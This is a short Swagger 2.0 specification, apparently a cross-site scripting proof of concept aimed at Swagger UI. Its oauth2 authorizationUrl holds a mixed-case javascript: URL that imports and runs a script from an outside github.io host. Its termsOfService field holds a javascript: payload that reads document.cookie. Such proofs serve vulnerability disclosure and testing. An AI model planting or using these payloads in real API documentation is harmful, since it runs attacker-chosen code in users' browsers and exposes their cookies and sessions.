swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: JAVascript:import('https://kaiksi-bb.github.io/pocpoc/script.js')//
info:
  version: "0.0.1"
  title: XSS PoC by Kaiksi
  description: Authorize!
  termsOfService: "javascript:alert(document.cookie)"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
